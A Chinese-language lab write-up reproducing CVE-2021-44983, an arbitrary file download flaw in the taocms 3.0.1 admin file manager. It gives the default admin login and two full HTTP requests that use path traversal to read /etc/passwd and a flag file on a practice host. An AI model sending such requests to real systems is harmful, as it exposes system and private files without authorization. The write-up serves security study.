🍉 === shell
来源:https://yunjing.ichunqiu.com/cve/detail/967?type=1&pay=2
漏洞信息
漏洞名称 | taocms 3.0.1 登陆后台后文件管理处存在任意文件下载漏洞 |
---|---|
漏洞编号 | CVE-2021-44983 |
危害等级 | 中危 |
漏洞类型 | 任意文件下载 |
漏洞厂商 | - |
漏洞组件 | - |
受影响版本 | taocms 3.0.1 |
漏洞概述 : Taocms是中国的一个微型 Cms(内容管理系统)。
taocms 存在安全漏洞,该漏洞源于 taocms 3.0.1 版本登录后台后,文件管理栏有任意文件下载漏洞。
漏洞复现
右下导航管理,来到管理登录页面,默认账号密码为admin和tao
来到文件管理,随意下载一个文件,同时bp抓包,这里下载/etc/passwd文件
修改成:
GET /admin/admin.php?action=file&ctrl=download&path=…/…/…/…/…/…/…/…/etc/passwd HTTP/1.1
Host: eci-2zegdpiqks0rx2i7rv1s.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://eci-2zegdpiqks0rx2i7rv1s.cloudeci1.ichunqiu.com/admin/admin.php?action=file&ctrl=lists
Cookie: PHPSESSID=3or4ue21gj4fdmsviqiatmh42q
Upgrade-Insecure-Requests: 1
然后放包,发现下载了passwd.htm文件打开看就是/etc/passwd文件的内容
读取flag
很简单,重新来一遍,这里下载根目录下的flag
GET /admin/admin.php?action=file&ctrl=download&path=…/…/…/…/…/…/flag HTTP/1.1
Host: eci-2zegdpiqks0rx2i7rv1s.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://eci-2zegdpiqks0rx2i7rv1s.cloudeci1.ichunqiu.com/admin/admin.php?action=file&ctrl=lists
Cookie: PHPSESSID=3or4ue21gj4fdmsviqiatmh42q
Upgrade-Insecure-Requests: 1
获取flag.htm文件,查看: